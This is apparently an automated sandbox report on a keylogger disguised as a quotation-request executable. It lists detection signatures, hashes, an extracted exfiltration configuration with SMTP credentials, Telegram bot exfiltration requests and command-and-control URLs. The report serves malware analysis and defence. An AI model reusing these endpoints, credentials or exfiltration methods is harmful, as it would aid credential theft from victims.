Windows Analysis Report
Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Overview

General Information

Sample name: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Analysis ID: 1560113
MD5: 1ae7a890014eba9c807c6adeabac7671
SHA1: e3b92645849a3e064d9fc401badf115dab013839
SHA256: bba1825bd893328442cb891a35420a5da41a5431d1ade643f085c5992e763d3a
Tags: exe, user-TeamDreier

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "katiavicente@catanhoinvestments.com", "Password": "RPgi34L1yoc", "Host": "mail.catanhoinvestments.com", "Port": "587", "Version": "4.4"}
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "katiavicente@catanhoinvestments.com", "Password": "RPgi34L1yoc", "Host": "mail.catanhoinvestments.com", "Port": "587"}
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe ReversingLabs: Detection: 52%
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe ReversingLabs: Detection: 52%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Joe Sandbox ML: detected
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Joe Sandbox ML: detected

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49727 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49742 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49834 version: TLS 1.2
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 0741AF54h 0_2_0741B66D
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 0162F45Dh 9_2_0162F2C0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 0162F45Dh 9_2_0162F52F
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 0162F45Dh 9_2_0162F4AC
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 0162FC19h 9_2_0162F961
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DE31E0h 9_2_06DE2DC8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DE0D0Dh 9_2_06DE0B30
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DE1697h 9_2_06DE0B30
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DE2C19h 9_2_06DE2968
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEE959h 9_2_06DEE6B0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEE0A9h 9_2_06DEDE00
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEF209h 9_2_06DEEF60
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DECF49h 9_2_06DECCA0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DE31E0h 9_2_06DE2DC2
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DED7F9h 9_2_06DED550
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEE501h 9_2_06DEE258
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEF661h 9_2_06DEF3B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEEDB1h 9_2_06DEEB08
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DED3A1h 9_2_06DED0F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_06DE0040
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEFAB9h 9_2_06DEF810
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEDC51h 9_2_06DED9A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DE31E0h 9_2_06DE310E
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0269F45Dh 14_2_0269F2D3
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0269F45Dh 14_2_0269F4AC
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0269FC19h 14_2_0269F974
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 06550D0Dh 14_2_06550B30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 06551697h 14_2_06550B30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 06552C19h 14_2_06552968
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 065531E0h 14_2_06552DC8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655E501h 14_2_0655E258
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06550673
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655E0A9h 14_2_0655DE00
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655E959h 14_2_0655E6B0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655F209h 14_2_0655EF60
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655EDB1h 14_2_0655EB08
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655F661h 14_2_0655F3B8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06550853
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06550040
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655FAB9h 14_2_0655F810
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655D3A1h 14_2_0655D0F8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655CF49h 14_2_0655CCA0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655D7F9h 14_2_0655D550
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 065531E0h 14_2_0655310E
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 065531E0h 14_2_06552DC2
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655DC51h 14_2_0655D9A8

Networking

Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2014:24:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2011:49:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49749 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49720 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49757 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49741 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49740 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49734 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49751 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49748 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49767 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49775 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49828 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49764 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49797 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49806 -> 188.114.97.3:443
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 21 Nov 2024 11:20:42 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 21 Nov 2024 11:20:46 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3841092416.00000000069A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/C5
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1415188848.000000000310A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000A.00000002.1469660734.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.dr String found in binary or memory: http://tempuri.org/ianiDataSet.xsd
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.dr String found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.dr String found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20a
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029DE000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003247000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000318F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.000000000286E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003120000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.000000000286E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002898000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000314A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000318F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002898000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
